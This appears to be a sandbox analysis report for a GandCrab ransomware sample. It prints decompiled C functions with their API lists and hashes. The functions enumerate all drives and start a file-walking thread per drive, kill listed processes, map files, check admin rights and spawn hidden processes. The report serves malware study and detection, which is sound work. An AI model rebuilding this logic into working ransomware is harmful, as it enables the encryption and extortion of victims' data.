Function 0FBC2C50 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 62
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0FBC2C50(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				struct tagPAINTSTRUCT _v68;
				struct tagPAINTSTRUCT _v88;
				short _v100;
				intOrPtr _t13;
				void* _t15;
				struct HDC__* _t21;
				int _t30;

				_t13 =  *0xfbcf290; // 0x21
				asm("movdqu xmm0, [0xfbcf280]");
				_t30 = _a8;
				_v88.fErase = _t13;
				asm("movdqu [esp+0x10], xmm0");
				_t15 = _t30 - 2;
				if(_t15 == 0) {
					CreateThread(0, 0, E0FBC2AD0, 0, 0, 0);
					DestroyWindow(_a4);
					return 0xdeadbeef;
				} else {
					if(_t15 == 0xd) {
						_t21 = BeginPaint(_a4,  &_v68);
						TextOutW(_t21, 5, 5,  &_v100, lstrlenW( &_v100));
						EndPaint(_a4,  &_v88);
						return 0;
					} else {
						return DefWindowProcW(_a4, _t30, _a12, _a16);
					}
				}
			}

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 0FBC2C8A
BeginPaint.USER32(?,?), ref: 0FBC2C9F
lstrlenW.KERNEL32(?), ref: 0FBC2CAC
TextOutW.GDI32(00000000,00000005,00000005,?,00000000), ref: 0FBC2CBD
EndPaint.USER32(?,?), ref: 0FBC2CCB
CreateThread.KERNEL32 ref: 0FBC2CE9
DestroyWindow.USER32(?), ref: 0FBC2CF2

Strings

GandCrab!, xrefs: 0FBC2C5E

Memory Dump Source

Source File: 00000019.00000002.311520098.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000019.00000002.311494423.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311544647.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: PaintWindow$BeginCreateDestroyProcTextThreadlstrlen
String ID: GandCrab!
API String ID: 572880375-2223329875
Opcode ID: 8217c52b7df5c6fc0c02e62570d726a4e7a466420ec1ae4a86d8147b3f1c7347
Instruction ID: 7a036a22db281b1de9ce74273ebe5c2ae8c3c4123e3b6392088b0269ce752f56
Opcode Fuzzy Hash: 8217c52b7df5c6fc0c02e62570d726a4e7a466420ec1ae4a86d8147b3f1c7347
Instruction Fuzzy Hash: 22118E32104209ABD711DF68EC0AFAB7BACFB4D722F00069AFE41D6190E77199218FD5

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC48A8 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 46
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FBC48A8(void* __ebx, WCHAR* __ecx, void* __esi, void* __ebp, void* _a12) {
				int _t8;
				int _t9;
				void* _t15;
				WCHAR* _t17;
				void* _t18;
				signed int _t23;
				void* _t24;
				void* _t28;

				_t17 = __ecx;
				_t15 = __ebx;
				while(1) {
					L2:
					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
					if(_t8 == 0) {
						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
						if(_t18 != 0) {
							TerminateProcess(_t18, 0);
							CloseHandle(_t18);
						}
					}
					_t23 = _t23 + 1;
					_t5 = _t15 + 0x24; // 0x24
					_t17 = _t5;
					if(_t23 < 0x27) {
						continue;
					}
					L7:
					_t24 = _a12;
					_t9 = Process32NextW(_t24, _t15);
					_t7 = _t15 + 0x24; // 0x24
					_t17 = _t7;
					if(_t9 != 0) {
						_t23 = 0;
						do {
							goto L2;
						} while (_t23 < 0x27);
						goto L7;
					}
					if(_t15 != 0) {
						VirtualFree(_t15, 0, 0x8000);
					}
					return CloseHandle(_t24);
					L2:
					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
					if(_t8 == 0) {
						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
						if(_t18 != 0) {
							TerminateProcess(_t18, 0);
							CloseHandle(_t18);
						}
					}
					_t23 = _t23 + 1;
					_t5 = _t15 + 0x24; // 0x24
					_t17 = _t5;
				}
			}

APIs

lstrcmpiW.KERNEL32(00000002,00000024), ref: 0FBC48B5
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0FBC48C5
TerminateProcess.KERNEL32(00000000,00000000), ref: 0FBC48D4
CloseHandle.KERNEL32(00000000), ref: 0FBC48E1
Process32NextW.KERNEL32(?,00000000), ref: 0FBC48FA
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBC4913
CloseHandle.KERNEL32(?), ref: 0FBC491A

Strings

i)w, xrefs: 0FBC48B5

Memory Dump Source

Source File: 00000019.00000002.311520098.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000019.00000002.311494423.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311544647.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: CloseHandleProcess$FreeNextOpenProcess32TerminateVirtuallstrcmpi
String ID: i)w
API String ID: 999196985-1280834553
Opcode ID: c6e95a9b3d9e8923686dc6bf1a6c73c3a7fc395a87ac92ce4afedd1a71c53545
Instruction ID: c1683fce564be7ac8904ccf71296c944f59d1e98a39fd1906b248dfc2533f841
Opcode Fuzzy Hash: c6e95a9b3d9e8923686dc6bf1a6c73c3a7fc395a87ac92ce4afedd1a71c53545
Instruction Fuzzy Hash: F801F936200105EFD7119F52FCA9BAB776CEF89B22F1100A8FD09A7041DB74A9168FE1

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC3E20 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0FBC3E20(struct _SECURITY_ATTRIBUTES* __ecx) {
				char _v612;
				char _v644;
				void* _v908;
				void* _v912;
				intOrPtr _v916;
				intOrPtr _v920;
				short _v924;
				signed int _v928;
				void* _v932;
				void* _v936;
				intOrPtr _v940;
				intOrPtr _v944;
				intOrPtr _v948;
				long _v952;
				struct _SECURITY_ATTRIBUTES* _v956;
				struct _SECURITY_ATTRIBUTES* _v960;
				struct _SECURITY_ATTRIBUTES* _v964;
				char _v968;
				void* _t67;
				short _t68;
				intOrPtr _t69;
				int _t72;
				long _t75;
				signed int _t77;
				signed int _t80;
				intOrPtr* _t82;
				void* _t84;
				struct _SECURITY_ATTRIBUTES* _t87;
				long _t88;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t95;
				char _t101;
				intOrPtr _t106;
				void _t110;
				struct _SECURITY_ATTRIBUTES** _t114;
				intOrPtr _t115;
				signed int _t119;
				void* _t121;

				_t121 = (_t119 & 0xfffffff8) - 0x3c4;
				_t87 = __ecx;
				_v964 = __ecx;
				_t67 = VirtualAlloc(0, 0x18, 0x3000, 4);
				 *((intOrPtr*)(_t67 + 4)) = _t87;
				_t88 = 0;
				 *_t67 = 0x43;
				_t68 =  *L"?:\\"; // 0x3a003f
				_v924 = _t68;
				_t69 =  *0xfbcf348; // 0x5c
				_v920 = _t69;
				_v968 = GetTickCount();
				_t114 =  &_v644;
				_t110 = 0x41;
				do {
					_v924 = _t110;
					_t72 = GetDriveTypeW( &_v924);
					if(_t72 >= 2 && _t72 != 5) {
						 *((intOrPtr*)(_t114 - 4)) = _v964;
						_t84 = _t114 - 8;
						 *_t84 = _t110;
						 *_t114 = 0;
						_t114[2] = 0;
						_t114[3] = 0;
						 *((intOrPtr*)(_t121 + 0x48 + _t88 * 4)) = CreateThread(0, 0, E0FBC6DE0, _t84, 0, 0);
						_t88 = _t88 + 1;
						_t114 =  &(_t114[6]);
					}
					_t110 = _t110 + 1;
				} while (_t110 <= 0x5a);
				_v952 = _t88;
				asm("xorps xmm0, xmm0");
				_v956 = 0;
				_v960 = 0;
				asm("movlpd [esp+0x38], xmm0");
				asm("movlpd [esp+0x30], xmm0");
				WaitForMultipleObjects(_t88,  &_v908, 1, 0xffffffff);
				_t75 = GetTickCount();
				asm("xorps xmm0, xmm0");
				_t115 = _v948;
				_v932 = _t75 - _v968;
				_t77 = 0;
				_v964 = 0;
				asm("movlpd [esp+0x40], xmm0");
				if(_t88 < 2) {
					_t95 = _v940;
					_t106 = _v944;
				} else {
					_t26 = _t88 - 2; // -1
					_t92 = _v940;
					_t82 =  &_v612;
					_t101 = (_t26 >> 1) + 1;
					_v968 = _t101;
					_v928 = _t101 + _t101;
					_t106 = _v944;
					do {
						_t92 = _t92 +  *((intOrPtr*)(_t82 - 0x18));
						_v956 = _v956 +  *((intOrPtr*)(_t82 - 0x20));
						asm("adc edi, [eax-0x14]");
						_t115 = _t115 +  *_t82;
						_v960 = _v960 +  *((intOrPtr*)(_t82 - 8));
						asm("adc edx, [eax+0x4]");
						_t82 = _t82 + 0x30;
						_t41 =  &_v968;
						 *_t41 = _v968 - 1;
					} while ( *_t41 != 0);
					_t77 = _v928;
					_v968 = _t92;
					_t88 = _v952;
					_t95 = _v968;
				}
				if(_t77 >= _t88) {
					_t89 = _v916;
				} else {
					_t80 = _t77 + _t77 * 2;
					_v964 =  *((intOrPtr*)(_t121 + 0x150 + _t80 * 8));
					_t89 =  *((intOrPtr*)(_t121 + 0x158 + _t80 * 8));
				}
				asm("adc edx, edi");
				asm("adc edx, eax");
				return E0FBC5670(_v960 + _v956 + _v964, _v932, _t115 + _t95 + _t89, _t106);
			}

APIs

VirtualAlloc.KERNEL32(00000000,00000018,00003000,00000004), ref: 0FBC3E40
GetTickCount.KERNEL32 ref: 0FBC3E65
GetDriveTypeW.KERNEL32(?), ref: 0FBC3E8A
CreateThread.KERNEL32 ref: 0FBC3EC9
WaitForMultipleObjects.KERNEL32(00000000,?), ref: 0FBC3F0B
GetTickCount.KERNEL32 ref: 0FBC3F11

Strings

?:\, xrefs: 0FBC3E53

Memory Dump Source

Source File: 00000019.00000002.311520098.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000019.00000002.311494423.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311544647.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: CountTick$AllocCreateDriveMultipleObjectsThreadTypeVirtualWait
String ID: ?:\
API String ID: 458387131-2533537817
Opcode ID: 7a670ff279982c8344214853151b9efb3eb2cae35231909d5232fab0ac50a115
Instruction ID: d5b61d86d2fcef634e5dd8039a7d087c43602fc62b93d0e61b5d50a41e5890a4
Opcode Fuzzy Hash: 7a670ff279982c8344214853151b9efb3eb2cae35231909d5232fab0ac50a115
Instruction Fuzzy Hash: 79512270A083019FC310CF19D898B5BBBE5FF88324F548A6DEA899B351D375A944CF96

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC6DE0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FBC6DE0(void* _a4) {
				intOrPtr _v0;
				intOrPtr _v4;
				long _v8;
				intOrPtr _v12;
				void* _v16;
				struct _CRITICAL_SECTION _v40;
				WCHAR* _t12;
				void* _t22;

				_t12 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
				_t22 = _a4;
				wsprintfW(_t12, L"%c:\\",  *_t22 & 0x0000ffff);
				InitializeCriticalSection( &_v40);
				_v12 = 0x2710;
				_v8 = 0;
				_v4 = 0xffffffff;
				_v0 = 0xffffffff;
				_v16 = VirtualAlloc(0, 0x9c40, 0x3000, 4);
				E0FBC6C90(_t22 + 8, _t12,  &_v40,  *((intOrPtr*)(_t22 + 4)), _t22 + 8, _t22 + 0x10);
				VirtualFree(_t22, 0, 0x8000);
				ExitThread(0);
			}

0x0fbc6df9
0x0fbc6dff
0x0fbc6e0e
0x0fbc6e1c
0x0fbc6e30
0x0fbc6e38
0x0fbc6e40
0x0fbc6e48
0x0fbc6e56
0x0fbc6e6b
0x0fbc6e7b
0x0fbc6e83

APIs

VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040), ref: 0FBC6DF9
wsprintfW.USER32 ref: 0FBC6E0E
InitializeCriticalSection.KERNEL32(?), ref: 0FBC6E1C
VirtualAlloc.KERNEL32 ref: 0FBC6E50

Part of subcall function 0FBC6C90: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0FBC6CC3
Part of subcall function 0FBC6C90: lstrcatW.KERNEL32(00000000,0FBCFEC4), ref: 0FBC6CDB
Part of subcall function 0FBC6C90: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0FBC6CE5

VirtualFree.KERNEL32(?,00000000,00008000,00009C40,00003000,00000004), ref: 0FBC6E7B
ExitThread.KERNEL32 ref: 0FBC6E83

Strings

%c:\, xrefs: 0FBC6E08

Memory Dump Source

Source File: 00000019.00000002.311520098.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000019.00000002.311494423.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311544647.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$CriticalExitFileFindFirstFreeInitializeSectionThreadlstrcatlstrlenwsprintf
String ID: %c:\
API String ID: 1988002015-3142399695
Opcode ID: a7a5a48a28d417032a29b0945952d87f3db8ab125fdf9f189af22e61b9706b16
Instruction ID: 5730dfffe02e6df8f01dba572f8851524e813bdda575cb603a2c81b6c667824c
Opcode Fuzzy Hash: a7a5a48a28d417032a29b0945952d87f3db8ab125fdf9f189af22e61b9706b16
Instruction Fuzzy Hash: 3601C4B0144304BBE3109F12DC9AF177BACAB49B21F004648FB649A1C1D7B89515CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC2890 Relevance: 12.1, APIs: 8, Instructions: 90
fileCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E0FBC2890(WCHAR* __ecx, intOrPtr __edx) {
				long _v8;
				intOrPtr _v12;
				void* _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t14;
				void* _t18;
				void* _t23;
				WCHAR* _t29;
				void* _t34;
				signed int _t35;
				long _t37;
				void* _t38;
				void* _t40;

				_t29 = __ecx;
				_t28 = 0;
				_v12 = __edx;
				_t34 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
				if(_t34 == 0xffffffff) {
					L3:
					return 0;
				} else {
					_v8 = GetFileSize(_t34, 0);
					E0FBC3030(0, _t34, _t35);
					asm("sbb esi, esi");
					_t37 = (_t35 & 0x00000003) + 1;
					_t14 = E0FBC3030(0, _t34, _t37);
					asm("sbb eax, eax");
					_t18 = CreateFileMappingW(_t34, 0, ( ~_t14 & 0xfffffffa) + 8, 0, 0, 0);
					_v16 = _t18;
					if(_t18 != 0) {
						_t38 = MapViewOfFile(_t18, _t37, 0, 0, 0);
						if(_t38 != 0) {
							_t23 = E0FBC3030(0, _t34, _t38);
							if(_t23 == 0) {
								_push(_t29);
								_t4 = _t38 + 0x53; // 0x53
								_t29 = _t4;
								_t5 = _t23 + 6; // 0x6
								E0FBC82A0(_t29, _t5);
								_t40 = _t40 + 4;
							}
							_push(_t29);
							_t28 = E0FBC2830(_v12, _t38, _v8);
							UnmapViewOfFile(_t38);
						}
						CloseHandle(_v16);
						CloseHandle(_t34);
						return _t28;
					} else {
						CloseHandle(_t34);
						goto L3;
					}
				}
			}

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,772D82B0,00000000,?,?,0FBC2C02), ref: 0FBC28AB
GetFileSize.KERNEL32(00000000,00000000,?,?,0FBC2C02), ref: 0FBC28BA
CreateFileMappingW.KERNEL32(00000000,00000000,-00000008,00000000,00000000,00000000,?,?,0FBC2C02), ref: 0FBC28E5
CloseHandle.KERNEL32(00000000,?,?,0FBC2C02), ref: 0FBC28F3
MapViewOfFile.KERNEL32(00000000,772D82B1,00000000,00000000,00000000,?,?,0FBC2C02), ref: 0FBC290A
UnmapViewOfFile.KERNEL32(00000000,?,?,?,?,0FBC2C02), ref: 0FBC2942
CloseHandle.KERNEL32(?,?,?,0FBC2C02), ref: 0FBC2951
CloseHandle.KERNEL32(00000000,?,?,0FBC2C02), ref: 0FBC2954

Memory Dump Source

Source File: 00000019.00000002.311520098.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000019.00000002.311494423.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311544647.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateView$MappingSizeUnmap
String ID:
API String ID: 265113797-0
Opcode ID: 5c26d8c559a01b24257e2d8b49869bf094335dff9d5df4bbc7ad016ccea5f342
Instruction ID: cd02d3527c9794b5672fcadbaec6107ac8f54f9ef377d7d8041f02c31f6afa85
Opcode Fuzzy Hash: 5c26d8c559a01b24257e2d8b49869bf094335dff9d5df4bbc7ad016ccea5f342
Instruction Fuzzy Hash: 48210772A012187FE7106B75AC85FBF776CDB4A676F4042A8FD01E3181D6389C114DE1

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC6850 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 96
stringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0FBC6850(WCHAR* __ecx) {
				intOrPtr _v8;
				signed int _t11;
				void* _t20;
				void* _t23;
				signed int _t26;
				signed int _t27;
				intOrPtr _t28;
				void* _t31;
				signed short* _t35;
				WCHAR* _t38;
				WCHAR* _t40;
				void* _t44;

				_push(__ecx);
				_t38 = __ecx;
				if( *0xfbd2a60 != 0) {
					_t11 = lstrlenW(__ecx);
					_t40 = _t38 + _t11 * 2 + 0xfffffffe;
					if(_t11 == 0) {
						L7:
						return 1;
					} else {
						while( *_t40 != 0x2e) {
							_t40 = _t40 - 2;
							_t11 = _t11 - 1;
							if(_t11 != 0) {
								continue;
							}
							break;
						}
						if(_t11 != 0) {
							_t23 = VirtualAlloc(0, 4 + lstrlenW(_t40) * 2, 0x3000, 4);
							wsprintfW(_t23, L"%s ", _t40);
							_t35 =  *0xfbd2a60; // 0x0
							_t28 = 0;
							_v8 = 0;
							if( *_t23 == 0) {
								L20:
								_t29 =  !=  ? 1 : _t28;
								_v8 =  !=  ? 1 : _t28;
							} else {
								_t26 =  *_t35 & 0x0000ffff;
								if(_t26 != 0) {
									_t44 = _t35 - _t23;
									do {
										_t20 = _t23;
										if(_t26 == 0) {
											L16:
											if( *_t20 == 0) {
												goto L19;
											} else {
												goto L17;
											}
										} else {
											while(1) {
												_t27 =  *_t20 & 0x0000ffff;
												if(_t27 == 0) {
													break;
												}
												_t31 = ( *(_t44 + _t20) & 0x0000ffff) - _t27;
												if(_t31 != 0) {
													goto L16;
												} else {
													_t20 = _t20 + 2;
													if( *(_t44 + _t20) != _t31) {
														continue;
													} else {
														goto L16;
													}
												}
												goto L21;
											}
											L19:
											_t28 = 0;
											goto L20;
										}
										goto L21;
										L17:
										_t26 = _t35[1] & 0x0000ffff;
										_t35 =  &(_t35[1]);
										_t44 = _t44 + 2;
									} while (_t26 != 0);
								}
							}
							L21:
							VirtualFree(_t23, 0, 0x8000);
							return _v8;
						} else {
							goto L7;
						}
					}
				} else {
					return 1;
				}
			}

APIs

lstrlenW.KERNEL32(00000000,00000010,00000000,00000000,?,0FBC698A), ref: 0FBC6872

Strings

%s , xrefs: 0FBC68B9

Memory Dump Source

Source File: 00000019.00000002.311520098.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000019.00000002.311494423.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311544647.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: %s
API String ID: 1659193697-4273690596
Opcode ID: 91069ff8d528a4d4f30e5f3d412a3e27fc0340e2d8cea8b3004c1d704acfc8ca
Instruction ID: e32d1a96b2b252f77c74a165be78d41a11524dd0df7b9c87679958b74f92e481
Opcode Fuzzy Hash: 91069ff8d528a4d4f30e5f3d412a3e27fc0340e2d8cea8b3004c1d704acfc8ca
Instruction Fuzzy Hash: D4212632A0022897D7305B1DBC10BB373AAEB88722F4541AEEC4D9B181E7F569518AD0

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC4C40 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
processCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0FBC4C40(WCHAR* __ecx) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v92;
				intOrPtr _t15;
				intOrPtr _t16;
				WCHAR* _t25;

				asm("xorps xmm0, xmm0");
				_t25 = __ecx;
				asm("movdqu [ebp-0x10], xmm0");
				E0FBC9010( &_v92, 0, 0x44);
				_t15 =  *0xfbd2a6c; // 0x49c
				_v92.hStdError = _t15;
				_v92.hStdOutput = _t15;
				_t16 =  *0xfbd2a68; // 0x4a4
				_v92.dwFlags = _v92.dwFlags | 0x00000101;
				_v92.hStdInput = _t16;
				_v92.wShowWindow = 0;
				_v92.cb = 0x44;
				if(CreateProcessW(0, _t25, 0, 0, 1, 0, 0, 0,  &_v92,  &_v20) != 0) {
					CloseHandle(_v20);
					return CloseHandle(_v20.hThread);
				} else {
					return GetLastError();
				}
			}

0x0fbc4c4c
0x0fbc4c52
0x0fbc4c54
0x0fbc4c59
0x0fbc4c5e
0x0fbc4c66
0x0fbc4c69
0x0fbc4c6c
0x0fbc4c71
0x0fbc4c78
0x0fbc4c7d
0x0fbc4c88
0x0fbc4ca7
0x0fbc4cbd
0x0fbc4cc8
0x0fbc4ca9
0x0fbc4cb3
0x0fbc4cb3

APIs

_memset.LIBCMT ref: 0FBC4C59
CreateProcessW.KERNEL32 ref: 0FBC4C9F
GetLastError.KERNEL32(?,?,00000000), ref: 0FBC4CA9
CloseHandle.KERNEL32(?,?,?,00000000), ref: 0FBC4CBD
CloseHandle.KERNEL32(?,?,?,00000000), ref: 0FBC4CC2

Strings

D, xrefs: 0FBC4C88

Memory Dump Source

Source File: 00000019.00000002.311520098.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000019.00000002.311494423.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311544647.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateErrorLastProcess_memset
String ID: D
API String ID: 1393943095-2746444292
Opcode ID: 3ded5f06b6b090fff1411225944aaf165f794c8e9146ce9580d6f57825b5201f
Instruction ID: 347ac2b6817162da443f7fc4c5e2a575a7ad950531b258e8f4635f8d330eb7b6
Opcode Fuzzy Hash: 3ded5f06b6b090fff1411225944aaf165f794c8e9146ce9580d6f57825b5201f
Instruction Fuzzy Hash: 15015E71E4021CAADB20DBA59C06BDE7BB8EB08B11F100156EA08BB180E7B525548FD5

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC3AA0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E0FBC3AA0() {
				signed int _v8;
				void* _v12;
				short _v16;
				struct _SID_IDENTIFIER_AUTHORITY _v20;
				int _t13;
				_Unknown_base(*)()* _t15;
				signed int _t16;

				_v20.Value = 0;
				_v16 = 0x500;
				_t13 = AllocateAndInitializeSid( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
				if(_t13 != 0) {
					_t15 = GetProcAddress(GetModuleHandleA("advapi32.dll"), "CheckTokenMembership");
					_t16 =  *_t15(0, _v12,  &_v8);
					asm("sbb eax, eax");
					_v8 = _v8 &  ~_t16;
					FreeSid(_v12);
					return _v8;
				} else {
					return _t13;
				}
			}

0x0fbc3aa9
0x0fbc3ac9
0x0fbc3ad0
0x0fbc3ad8
0x0fbc3aef
0x0fbc3afe
0x0fbc3b05
0x0fbc3b07
0x0fbc3b0a
0x0fbc3b16
0x0fbc3add
0x0fbc3add
0x0fbc3add

APIs

AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0FBC3AD0
GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0FBC3AE3
GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0FBC3AEF
FreeSid.ADVAPI32(?), ref: 0FBC3B0A

Strings

CheckTokenMembership, xrefs: 0FBC3AE9
advapi32.dll, xrefs: 0FBC3ADE

Memory Dump Source

Source File: 00000019.00000002.311520098.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000019.00000002.311494423.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311544647.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: AddressAllocateFreeHandleInitializeModuleProc
String ID: CheckTokenMembership$advapi32.dll
API String ID: 3309497720-1888249752
Opcode ID: 669f028598699ec8c7e04a2b4b4d9e463f9f5b82d38373e5101831f563b5b855
Instruction ID: 20715cd65775a414428025a7b6d4829539e61f084efa534a52fb62a53d660c64
Opcode Fuzzy Hash: 669f028598699ec8c7e04a2b4b4d9e463f9f5b82d38373e5101831f563b5b855
Instruction Fuzzy Hash: A6F03C30A8020DBBDB009BE5EC0AFAE777CEB08712F0045C4F904E6181E67466158E95

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC6D09 Relevance: 9.0, APIs: 6, Instructions: 48
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0FBC6D09() {
				intOrPtr* _t34;
				intOrPtr* _t38;
				void* _t40;
				WCHAR* _t46;
				void* _t51;

				do {
					if(lstrcmpW(_t51 - 0x238, ".") != 0 && lstrcmpW(_t51 - 0x238, L"..") != 0) {
						lstrcatW(_t46, _t51 - 0x238);
						if(( *(_t51 - 0x264) & 0x00000010) == 0) {
							 *((intOrPtr*)(_t51 - 0xc)) =  *_t38;
							 *_t38 =  *_t38 + E0FBC6950(_t46, _t51 - 0x264, __eflags, _t40,  *((intOrPtr*)(_t51 + 8)));
							asm("adc [ebx+0x4], edx");
							__eflags =  *((intOrPtr*)(_t38 + 4)) -  *((intOrPtr*)(_t38 + 4));
							if(__eflags <= 0) {
								if(__eflags < 0) {
									L8:
									_t34 =  *((intOrPtr*)(_t51 + 0xc));
									 *_t34 =  *_t34 + 1;
									__eflags =  *_t34;
								} else {
									__eflags =  *((intOrPtr*)(_t51 - 0xc)) -  *_t38;
									if(__eflags < 0) {
										goto L8;
									}
								}
							}
						} else {
							E0FBC6C90(lstrcatW(_t46, "\\"), _t46,  *((intOrPtr*)(_t51 - 0x14)),  *((intOrPtr*)(_t51 + 8)),  *((intOrPtr*)(_t51 + 0xc)), _t38);
						}
						 *((short*)( *((intOrPtr*)(_t51 - 0x10)))) = 0;
					}
				} while (FindNextFileW( *(_t51 - 8), _t51 - 0x264) != 0);
				FindClose( *(_t51 - 8));
				return 0;
			}

APIs

